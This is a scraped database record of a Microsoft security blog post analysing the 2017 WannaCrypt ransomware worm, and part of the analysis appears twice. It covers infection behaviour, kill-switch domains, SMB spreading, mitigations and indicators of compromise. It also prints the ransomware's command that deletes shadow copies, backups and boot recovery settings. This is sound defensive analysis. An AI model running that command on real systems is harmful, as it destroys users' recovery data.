.zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. 
In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * 
_TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. 
For example, if a file is named _picture.jpg_, the ransomware encrypts and renames the file to _picture.jpg.WNCRY_.\n\nThis ransomware also creates the file _@Please_Read_Me@.txt_ in every folder where files are encrypted. The file contains the same ransom message shown in the replaced wallpaper image (see screenshot below).\n\nAfter completing the encryption process, the malware deletes the volume shadow copies by running the following command:\n\n_cmd.exe /c vssadmin delete shadows /all /quiet &amp; wmic shadowcopy delete &amp; bcdedit /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no &amp; wbadmin delete catalog -quiet_\n\nIt then replaces the desktop background image with the following message:\n\n[![wannacrypt-ransom-note](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-note.png>)\n\nIt also runs an executable showing a ransom note which indicates a $300 ransom in Bitcoins as well as a timer:\n\n[![wannacrypt-ransom-executable](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-ransom-executable.png>)\n\nThe text is localized into the following languages: Bulgarian, Chinese (simplified), Chinese (traditional), Croatian, Czech, Danish, Dutch, English, Filipino, Finnish, French, German, Greek, Indonesian, Italian, Japanese, Korean, Latvian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Spanish, Swedish, Turkish, and Vietnamese.\n\nThe ransomware also demonstrates the decryption capability by allowing the user to decrypt a few random files, free of charge. 
It then quickly reminds the user to pay the ransom to decrypt all the remaining files.\n\n[![wannacrypt-decryptor](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-decryptor.png>)\n\n## Spreading capability\n\nThe worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in a large volume of outbound SMB traffic (TCP port 445) from the infected host, which can be observed by SecOps personnel, as shown below.\n\n[![wannacrypt-exploit](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt-exploit.png>)\n\nThe Internet scanning routine randomly generates octets to form the IPv4 address. The malware then targets that IP to attempt to exploit CVE-2017-0145. The threat skips the generated IPv4 address if the first octet is 127 (the loopback range) or is equal to or greater than 224 (multicast and reserved address space), so that no exploitation attempts are wasted on addresses that cannot belong to a reachable host. Once a vulnerable machine is found and infected, it becomes the next hop to infect other machines. 
The vicious infection cycle continues as the scanning routine discovers unpatched computers.\n\nWhen it successfully infects a vulnerable computer, the malware runs kernel-level shellcode that seems to have been copied from the public backdoor known as DOUBLEPULSAR, but with certain adjustments to drop and execute the ransomware dropper payload, both for x86 and x64 systems.\n\n[![wannacrypt7](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt7.png>)\n\n[![wannacrypt8](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt8.png>)\n\n## Protection against the WannaCrypt attack\n\nTo get the latest protection from Microsoft, upgrade to [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>). Keeping your computers [up-to-date](<https://www.microsoft.com/en-us/security/portal/mmpc/help/updatefaqs.aspx>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows.\n\nWe recommend customers who have not yet installed the security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. 
Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface. Note that these workarounds reduce exposure but do not remove the vulnerability; installing MS17-010 remains the actual fix:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445. A perimeter rule only limits exposure from the Internet; because the worm component also scans the local network, unpatched hosts remain reachable from an already-infected internal machine unless port 445 is also restricted between internal hosts (for example, with host-based firewall rules or network segmentation)\n\n[Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects this threat as [Ransom:Win32/WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>) as of the _1.243.297.0_ update. Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nUse [Office 365 Advanced Threat Protection](<https://blogs.office.com/2015/04/08/introducing-exchange-online-advanced-threat-protection/>), which has machine learning capability that blocks dangerous email threats, such as the emails carrying ransomware.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 
x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nCustomer guidance for WannaCrypt attacks: <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\n## Indicators of compromise\n\nSHA1 of samples analyzed:\n\n * 51e4307093f8ca8854359c0ac882ddca427a813c\n * e889544aff85ffaf8b0d0da705105dee7c97fe26\n\nFiles created:\n\n * %SystemRoot%\\mssecsvc.exe\n * %SystemRoot%\\tasksche.exe\n * %SystemRoot%\\qeriuwjhrf\n * b.wnry\n * c.wnry\n * f.wnry\n * r.wnry\n * s.wnry\n * t.wnry\n * u.wnry\n * taskdl.exe\n * taskse.exe\n * 00000000.eky\n * 00000000.res\n * 00000000.pky\n * @WanaDecryptor@.exe\n * @Please_Read_Me@.txt\n * m.vbs\n * @WanaDecryptor@.exe.lnk\n * @WanaDecryptor@.bmp\n * 274901494632976.bat\n * taskdl.exe\n * Taskse.exe\n * Files with \".wnry\" extension\n * Files with \".WNCRY\" extension\n\nRegistry keys created:\n\n * HKLM\\SOFTWARE\\WanaCrypt0r\\wd\n\n \n\n \n\n_Karthik Selvaraj, Elia Florio, Andrea Lelli, and Tanmay Ganacharya ([@tanmayg](<https://twitter.com/tanmayg>))_ \n_Microsoft Malware Protection Center ([@msftmmpc](<https://twitter.com/msftmmpc>))_\n\n \n\nRelated blog entries:\n\n[Windows 10 Creators 
Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-15T09:08:41", "references": [{"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", 
"THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2017-09-15T09:08:41", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "51bb28bfd48664f7123e2bd0496cb5e4e7486f18ac8f563d47dac1047f115f8f", "hashmap": [{"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "7ffd9eda0c71ce3b65053213385512d5", "key": "href"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "69654611badaced3e365c04618737412", "key": "title"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": 
"2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "e8ece5e56bdd3732ba7cab6279f9f4ba", "key": "description"}, {"hash": "2539359a3785695f4c56ccf35c614000", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "2539359a3785695f4c56ccf35c614000", "key": "published"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "immutableFields": [], "lastseen": "2017-09-15T09:08:41", "modified": "2017-05-13T06:40:39", "objectVersion": "1.5", "published": "2017-05-13T06:40:39", "references": [], "reporter": "msft-mmpc", "title": "WannaCrypt ransomware worm targets out-of-date systems", "type": "mmpc", "viewCount": 228}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-15T09:08:41"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "On May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. 
Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. 
This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. 
The ransomware known as WannaCrypt\n\nThe dropper tries to connect the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[![wannacrypt1](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[![wannacrypt2](https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png)](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. 
In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * 
_TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , .mov , .stw , .backup , .mp3 , .suo , .bak , .mp4 , .svg , .bat , .mpeg , .swf , .bmp , .mpg , .sxc , .brd , .msg , .sxd , .bz2 , .myd , .sxi , .c , .myi , .sxm , .cgm , .nef , .sxw , .class , .odb , .tar , .cmd , .odg , .tbk , .cpp , .odp , .tgz , .crt , .ods , .tif , .cs , .odt , .tiff , .csr , .onetoc2 , .txt , .csv , .ost , .uop , .db , .otg , .uot , .dbf , .otp , .vb , .dch , .ots , .vbs , .der\" , .ott , .vcd , .dif , .p12 , .vdi , .dip , .PAQ , .vmdk , .djvu , .pas , .vmx , .docb , .pdf , .vob , .docm , .pem , .vsd , .docx , .pfx , .vsdx , .dot , .php , .wav , .dotm , .pl , .wb2 , .dotx , .png , .wk1 , .dwg , .pot , .wks , .edb , .potm , .wma , .eml , .potx , .wmv , .fla , .ppam , .xlc , .flv , .pps , .xlm , .frm , .ppsm , .xls , .gif , .ppsx , .xlsb , .gpg , .ppt , .xlsm , .gz , .pptm , .xlsx , .h , .pptx , .xlt , .hwp , .ps1 , .xltm , .ibd , .psd , .xltx , .iso , .pst , .xlw , .jar , .rar , .zip , .java , .raw._\n\nWannaCrypt encrypts all files it finds and renames them by appending _.WNCRY_ to the file name. 
